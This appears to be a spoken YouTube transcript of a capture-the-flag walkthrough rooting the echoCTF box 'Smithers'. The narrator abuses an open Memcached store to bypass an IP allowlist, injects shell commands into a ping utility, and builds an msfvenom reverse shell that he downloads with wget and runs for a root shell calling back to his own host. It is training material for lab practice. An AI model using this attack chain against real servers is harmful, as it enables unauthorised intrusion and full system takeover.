Christoforos. Hello YouTube. Hello Mom. Today we will, or let me better say, we must hack Smithers from echoCTF and root this bad boy. So I got this in front of me. I already started the box. I'm already connected. I'm ready to rock. Let's see the hints first, shall we? My name is .pirate. I'm the, I don't know, dot of the pirate or something. So let's jump in. So the description says, like the real Smithers, this server will serve you well only if you manage to enter its Memcached store. Okay. Like Smithers, okay, that's the same thing. Okay. As you saw, I already did enumerate this box, so I don't waste any time. Let's do that again though. Sudo root nmap double verbose. Let me copy that IP. Copy that IP. Give me that. Give me. Put that here. SC for default scripts. SV to enumerate versions. That's the IPsec scan. If you guys don't know IPsec, just leave the video and just go see him. He's amazing. Okay. So we put the IP. We said we want default scripts. We said we want to enumerate the version as well. And let's save this scan. So you see, I forgot to create. I forgot to be organized again. So make directory. Let's call it Smithers. Go into that directory and let's create an nmap directory. So we save our scripts there, right? Sudo nmap pv p. Let's specify the ports. Or was it 11 to 11 10 888? So 11 to 11 10 888. SC SB 10 10 5. Was it 5? No, 10031. 10031. Save. Oh wait, we're saving it to all formats. Nmap def scripts run. Give me everything you got. So right off the bat we get a hint. Memcached store. I don't know what's that. If you manage to enter its Memcached store. Okay, let's just look for it till that finishes, till the scan finishes, right? Oh, it's already finished. We've got a version as well. That's great. So we have an HTTP Nginx server, it seems, on port 10888, and we have something running on port 11 to 11 TCP open. This seems to be the Memcached server. Let's save this. Cherry tree, new instance, Smithers. Okay, let's make it like this. Nmap Yep. Split that. Let's make this look cool. Make it red. Gonna highlight the Memcached version and the port, of course. So let's start with the HTTP server first and then go to Memcached. Okay. Let's copy the port and let's visit to see what we got here.
Okay, let's save that. Documents, echoCTF, Smithers, CT, cherry tree. Let's call that notes. Okay, minimize that. So HTTP 10.0.53 and the port, and nothing happens. Okay, HTTP, but why? But why? What am I doing wrong? Is that the IP? Nope. Here we go. Network utilities. Let me make this bigger. Okay. The utilities are only available to authorized IPs only. If you need access to this page, contact the administrator to update the ACL. Contact the administrator. I don't see a phone number here, mate. Servers version 1.5.12. Okay. Visit. Oh, this is our IP address. They are on to us. Remote address value not found on key. Remote address value. So I guess this is a variable or some sort. Not found on key. Okay, you're not authorized to access this resource. We're gonna see if I'm not authorized. You believe I'm not authorized, but I am. Okay, so let's start. So we always do when we find a web server. Let's start to do some enumeration on it. However, we already know some stuff about this web server, which is engines, right? So let's create a subnode and call it HTTP, put the port right there, so we document everything. Let's copy this, let me get all of this. Okay, we can understand from this that we are blocked, right? The server has a whitelist, let's say, that allows only specific IPs, and we have to be authorized, right? So let's do, maybe we find some more directories. Let's brute force this, as we did in the previous videos. Gonna use GoBuster, of course. Let's create a directory and call it fuzz. I've installed GoBuster in, I remember it is in, there it is. Okay, let's call it 10.8.8.8 raft small words. RIP is 10.0.3.1 10.8.8.8. So we're telling GoBuster we want to do a directory brute forcing, right? We specify U is the URL of the target server, and -w it's the word list we're going to use. So let this run, and let's check what else can we do till that finishes. So we do have another port, which I think is the key port. This Memcached, as we saw from the hint. We can go ahead and see what Memcached is first, so we know what we're dealing with. What are you, Memcached? Okay, what is Memcached? A high performance in-memory key value store that is often used as a cache to speed up dynamic web applications. Okay, it works storing frequently access data in RAM, allowing for faster retrieval compared to, okay, so it's a cache storage tool This is how my brains understand it. My brain understands it, right? In memory caching. Okay. All right. Maybe memcache 1 point. What was it? 1 point. See my notes. 1.5.12. Maybe it's vulnerable to some publicly available exploit. 1.5.12 exploit. Okay. Cybersecurity help. Yes, help me. Help me hack this. Baraboom, barabam. Show more. And we are 1.5.12. Here we are. Non-vulnerabilities. I can't see nothing. Nothing. Memcached version 1.5.5. Insufficient control of network management. Yes, but we are on 1.12. Right? So, nope. Maybe if we put that in quotes to make our search more specific, also add like POC or GitHub. And no. Let's see. Again, 1.5.5. DOS attack. We don't wanna break the server. We wanna hack the server. Let's see what we have here. Nope. Okay. Let's say memcached enumeration. Hunting on memcached servers. Nice. Penetration testing on memcached server. Okay, I see. What up? Yeah, we can try connecting to it with Telnet or with Netcat. Ooh, we can specify commands on it, it seems. And we can get the OS version, right? Okay, let's try this out. Let's see what we can get just by connecting to it with Telnet, right? So is that the default port? Because I see he's using 11.2.11 as well. Okay, let's open a new tab. New SXL3. Let's do telnet. To have that from the previous try. 031. Okay, it seems that we are connected, and the dude here is saying, then let's try to connect to the Memcached server using telnet by typing blah blah blah. Yeah, we did that. Server information gathering. Yes, please. Version. Let's do version. Okay, so it works. We can do some actions through it. Stats. Let's get straight to fetch the variable data stored in the server. Type the command shown blah blah blah. Okay, so we can get data from the server. But what is all this? Can we do that as well? Stats. We do. Spicy. Accepting connections. Set to 1 here. I don't know what that is exactly, but get hits. We get some more versions here. Lib event, blah blah blah. Okay, you know what? Let's document this so we have it in our notes. Let's take this and say something along the lines of, let's do new one. This HTTP. No, it's not an HTTP, right? Let's say TCP Memcached port 11 to 11. Okay, okie dokie. Paste that in. Let's take this. Put it here. Make this bold with Control B, Shift Alt B to put the background, Shift Alt F. Okay. Let's make it look better and do that with another color to differentiate the output. Okay. And say something like, we found this article that shows us how to communicate with this server. So we found an article that shows how to communicate with the Memcached server through telnet. Cool. Alright. Let's see what else we can do. So data extraction and key dumping. That sounds spicy. So then we will run another command to fetch the slab statistics. Okay. Slabs are created and allocated for storing information within the cache. Okay, run the commands below. Stat slabs. I don't see any valuable data we can get through that. As you can observe in the above image, currently there is only one slab present in the server whose slab number is 1. Okay. Then let's run a command mentioned below to fetch count H eviction. Is that how you pronounce that? Expired, organized by slab ID. Okay, we see some items here. Okay, we should run this to see if we have any items. Do we? Shall we? We do have items. Yes, we do. Okay, number underscore hot. Damn. Okay, items 2. Is that the ID of the item or there are 2 items? I don't get it. We will get it though, right? Let's see. So it says here whose slab number is, oh, okay, so this is the slab number, slab ID. The above image gives us an insight into how the data is organized in slab ID. So we got slab ID 2 for us, right? Then let's run the command below to dump all the keys. Yes, we dump the keys, of course. Oh no, stats. Oh, I don't have backspace. Stats, cache, dump to 0. Okay, here, as you understand, we specified 2 because this is what we have here. It's the ID we have here. Yeah. Oh. I think we're on the right path. echoCTF. Yeah. What is that though? How can I see what the content of it? I'm sure this will help us. So the above image represents an item, item key, item size, expiration timestamp. Okay. Then we can simply use the get command to fetch the value stored in the keys as shown below. So it seems that we can just get it. Do you get it? We're gonna get it. Let's get it. Get, give me that. Macarena. So this is the first flag. Okay. I don't want the flag, I want access. Give me some access. As you can see in the above image, we have successfully dumped the data stored in the keys. Yes, we saw that. Okay, so there is different ways to dump data. Now we can start using it by typing in okay. So there is a tool. Also dump stuff. What's that all about? Here the memccp command is uploading a file. Oh, that's interesting. Presenting the root directory of our system. Now let's use memcat to view the content of the file which we have uploaded. Okay. So here's my thought process after seeing that. So if we can upload a file, right? And then we can view the file from this web server. And also because this web server is Nginx, and if we're lucky and this web server, which is Nginx, has PHP FPM, let's say, a module that can handle PHP scripts, then the path will be uploading a web shell, a PHP web shell, and then accessing it from here, and we get a web shell. So this is my theory for now. Let's see if that's possible. Yeah. First of all, let's get out of here. Dot quit, no. Dot exit, no. Buy, no. Dot out. Oh, come on. How do I get out of telnet? This is embarrassing. Oh my god. Exit telnet. Press control. What? Really? Then type quit or close and press enter. Okay. Quit. Yes. Okay. So first of all, let's see if we found anything while brute forcing. Nothing. Okay, we can try with larger words. Maybe we're more lucky in that. So raft, large words. Let's put that here. Large words. Okay. Move here. Let's split this. All right. Smithers. We can. Oh no! I was saving it outside. Never mind. Can create a directory and call it tap. We're going tap, and we're gonna create a file and call it test. Call it test.txt. Okay, we're gonna try uploading this test.txt through Memcached using Telnet, of course, or maybe we should use the other tool and see if we can access it from the server, right? So this is the scenario right now. Smithers, tap. Cool. Okay. What's the name of the tool? Do we have it already? Maybe we do. Memccp. Do I have memccp? Yes, I did it before. 3.1 test. Okay. Is it 3.1? No, right? Yeah, it's 3.1. Okay. So now we're gonna upload the test. It seems that it uploaded. and we can go ahead and read that file from, let's see if it's uploaded for sure first. How can I read that file? So memcached servers file. Okay, let's take this. I don't have memcached. Oh no. Okay, let's install this then. Yeah, that is. This is how you can install everything this guy uses. Sudo apt install lib memcached tools. Gimme all the tools. What? We have it? But I don't. Okay, there is another way to see if we uploaded the file, right? So it says up here that we can list items. How can we list items? Yeah, stats items. Stats items. You see, now we have 1 and we have 2, and we can go ahead and get it, right? Get it. Stats items. How do I list the items? Stats. So, okay, let's try that. Yep, test.txt. So we indeed uploaded the file. Great. So let's try and access this through the engine server test.txt. No, maybe memcached test.txt. Nope. Maybe uploads test.txt. Okay, so it seems that if there is a way we can access this file, we cannot find it yet. Also, our brute forcing didn't find any file yet or any directory. So let's continue and see what we can do. So going back to this and to the hint, it says that the server will serve you well only if you manage to enter his memcached store. So we can play with memcache and we can execute stuff on it. However, as you see here, remote address value not found on key. So maybe if there is a way to add or set a value in memcache, it would be ideal, because the attack path would be adding our IP address in that remote underscore address variable, and maybe after we can let ourselves in. So let's check if there is a way to add keys in memcache, right? Add keys in memcache telnet. Yes. How to interact with memcache internet? Is that what we? Is it the one we already opened? No. Brew is using Mac. Be gone. Okay. Get food. Yes, we already did that. We can get stuff. We know that. Is there any way to add stuff? We want to add stuff. Food bar stored. What's that? Cache set, cache get, cache delete. So now we seem to run them as. Okay. Prefix version key. Okay. Set key expiry time length in bytes. delete flash. Okay, Memcached. So connected. So this guy is setting a key. Is that correct? So set, I guess his key name is test. 0. What's 0 about? Is there a manual somewhere? Memcached commands manual, maybe? I remember I did find one. Is that it? Quick guide. Okay. So telnet host. Okay. The following example shows how to connect to Memcached server and execute a simple set and get command. Assume that the Memcached server is running on host blah blah blah. Set tutorials point 0909. So here it seems that he's setting a key. I assume this is a key, right? He's setting a key called tutorials point 0 blah blah blah. Okay, but what is 0? There it is. Okay, here is the syntax. So a new value to a new or existing key. That's what we want. Okay, so the basic syntax of memcached set command is as shown below. So we have to specify set, key, expiry time, bytes, blah blah blah. And let's see this example. So set the key name 0. What's 0? What's 0? Is that the flag? Expire time, bytes 900. So this is the bytes and it's 9. So it's 1, 2, 3, 4, 5, 6, 7, 8, 9. Okay, that's it. Okay, let's try and do that. Let's add this one. Let's add a key and call it set remote telnet. We want to set remote address 0, I guess, right? Because everybody has 0. Yeah, we're gonna say 0, and then we have to count. So our IP, it's, oh no, what it's 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12. So we have 12 here. Let's put it like this, maybe. Okay, and put here 12. Now I'm adding the value. Is that right? So we set the key. Where is it? We set the key, and now we add the value of the key. Yeah, because it says here get tutorials point, which is the key. Okay, I think this is it. Yeah, and the value underneath. Okay, perfect. So our value is our IP address. Copy, paste, and start. Yup. Let's get this. Yes. Okay, so our value is there. Refresh, and we are in. Okay, we are one step ahead. Okay, what's that now? So it seems that we can ping something. Let's ping ourselves. 10. No, don't show them that I did this again, because I did. Okay, so quit, exit. So we can say TCP dump, specify the interface, which is tan0 as we are from the VPN, and we want to capture ICMP packets. So let's try and ping ourselves. Ping. I didn't run this. Let's go again. Okay. Do it again. Ping. Nope. tan0 ICMP. But why? Oh, 10, 150. Yes, as you can see, we can ping, so we can reach our server back. So I just want to show something real quick. So in Linux, here is the scenario where we can do a command injection, I believe. Okay. So if we say ping 127.1.1.001, which we are ping ourselves, the loopback address. Okay. We can also, if we do what is that? The comma, okay, and then ls. Let's make it so it pings only 2 times, but because it will never stop. C2, so it will ping 2 times, and when it stops, it will also execute ls. 1, 2, and then ls. Okay. So what we can try here is see if we can escape the ping or make it ping and then do more stuff, right? So we can go ahead and put the comma here and do ls. So as you can see, we can execute commands on the server just by appending a comma. Also, I found out that this is possible with let me show an example. So if I do ping as we did before and then put end ls, what will this do? If this command is successful, then it will also do this command as well. Okay, so 1, 2 ls. Okay, so I think we can do this here as well. Ls. Yes, it seems we can. So we can do end, and who am I? Oh shit, we are rude already. We are rude right off the bat. Okay. So okay, let's get a shell on this box, shall we? Let's see if ncat is installed. So we can go ahead and do end and say which nc. So ncat is installed on the server. That's perfect. So let's spin up a listener nc nblp on 80. Okay, and do nc our IP on port 80, specify -e, flag e, bin bash, and yes, we got a connection back. No. We cannot execute commands though. This is broken. This is dead. Okay, so we have to try another way. Let's go with the traditional way, and let's create an MSF Venom payload for Linux, of course. So sudo MSF Venom. I already have the command here, but I'll go through it once. So -p is to specify the payload. If you want to see what payloads you have available with MS Venom, which is an amazing tool, you can do L payloads and grep for Linux, for example, but there are a lot of payloads. There are payloads for Windows as well, but in this case we want Linux. So if we do this, it will list all payloads and grep the ones that have the word Linux inside, which is the one we want. And as you can see, there are plenty of them to play around. There is interpreter shells, regular shells, normal shells, even bind shells. Okay, so let's go ahead and create our lovely payload. All right, okay. So we want 64 architecture. Actually, do we want 64 architecture? Let's check. So, and then you name A pink. Yup. 64 architecture. Shell reverse TCP. This is the non-staged shell. If you just remove the underscore here and add slash, you'll get a staged one. Let's try with non-staged one first. lhost equals our IP, so this is the local host IP, which is us, and the local port is 80. We want the file format to be an ELF file. This is the I could say equivalent of exe but for Linux, and we output it as this name, L for Linux. This is how I do it, non-staged x64. Okay, let's create the payload. Great, there it is. Let's spin up a web server with Python using the module HTTP server and specifying the port, and then so most of the times whenever I'm trying to upload something on Victim, I do it in the temp directory, because temp directory, it's usually writable by everyone, so we have more chances of succeeding. So we specify wget http our IP 11.150 and then we copy the name of our reverse shell, put there. Then I'm gonna do flag, which is -O, and specify the path I want to save this file, and go. As we can see, we successfully got the file. Let's check if we actually got it on the server. So we can do ls/temp. Yep, there it is. However, let me show this real quick. If we do la temp, we can see that the directory, the file is not executable. So in order to run this, we have to make it executable. To do that, we can do chmod +x/temp/ the name of the file, ping, and then do ls/la/temp to make sure that the job is done. Yep, you see that lovely X right there. It means that the file now it's executable. And let's get ourselves root. Give me the root. Give me the root. So we can do /temp the name of the file, and let's make sure that we listen on that port so we get the shell back. Port 80 ping, please. Yes, here we go, here we go. Who am I? Let me hear that. I'm root. We did it. Let's go to root, and there's our flag. Yeah, I'm gonna submit this flag. Yes, yes, yes. Let me submit this. Here. Kabang! Yes. I'll submit the other flag as well, which is in etc password. Is it here? Yeah, no. It's not here. Where is it? Where is the flag? Oh well. I'm gonna leave that, guys, for you. I'm not gonna search for the flag right now, but what I want to see is how others did it. And this echo trust, I don't know if it's them doing it or it's a user, but his write-ups are pretty well. Are you sure you want to enable access to write-ups for this target? Any main flags? What? I'm losing points? No. No. Anyway, guys, thank you very much for watching. I hope you find this, you enjoyed watching this. We made it, we hacked another target, and the next target will be, I think, Batwith. I think that's the one. Anyway, have a nice day and see you on the next one. Bye.